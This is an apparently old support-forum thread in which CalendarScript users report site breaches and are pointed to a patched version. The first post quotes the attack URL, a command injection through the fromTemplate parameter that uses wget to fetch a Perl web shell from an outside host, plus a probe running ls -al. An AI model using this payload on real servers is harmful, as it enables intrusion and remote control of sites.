next »

[oldwest]

Our site was breached via the calendar script, using a URL like:

calendar.pl?command=login&fromTemplate=|wget%20thehackerssite.ru/cgitelnet.pl%20%3E%3E%20cgitel.pl|

I patched the code to email me when someone tries this now, I see attempts like 'calendar.pl?command=login&fromTemplate=|ls%20-al|' get emailed to me still.

I have heavily modified Version: 3.1 and I would rather not have to patch in all the changes into the new version if I don't have to.

Did this security issue get addressed in the new version of CalendarScript?

In case it hasn't been patched yet in the new version I wanted to make sure its known.

[oldwest]

PS:

I think its script kiddies that are attacking the site, searching engines for calendar script sites just for fun.  There have been a number of seperate attacks that have tried to get data that the first attacker already had.  

This gives me the impression its multiple people who are not working together at all.

[DanO]

** Our site was breached via the calendar script **

CalendarScript version 3.21 came out to correct such vulnerabilities.

** I have heavily modified Version: 3.1 and I would rather not have to patch in all the changes into the new version if I don't have to. **

If you contact Matt via email he may be able to tell you the specific areas of the calendar file(s) which need changing. Other than that all I can think is you could compare the current release files with unmodified files of the version you are using to try to find where the changes are.

Dan O.

------------------

[This message has been edited by DanO (edited June 28, 2004).]

[Trisha]

Our site was breached as well today.. and there is at least one page out there that tells how to do it.. through calendarscript...

I hesitate to post the url, though.

trisha

[DanO]

** I hesitate to post the url **

Than maybe email it to Matt so he can see if he can do anything about it.

JMO

Dan O.

------------------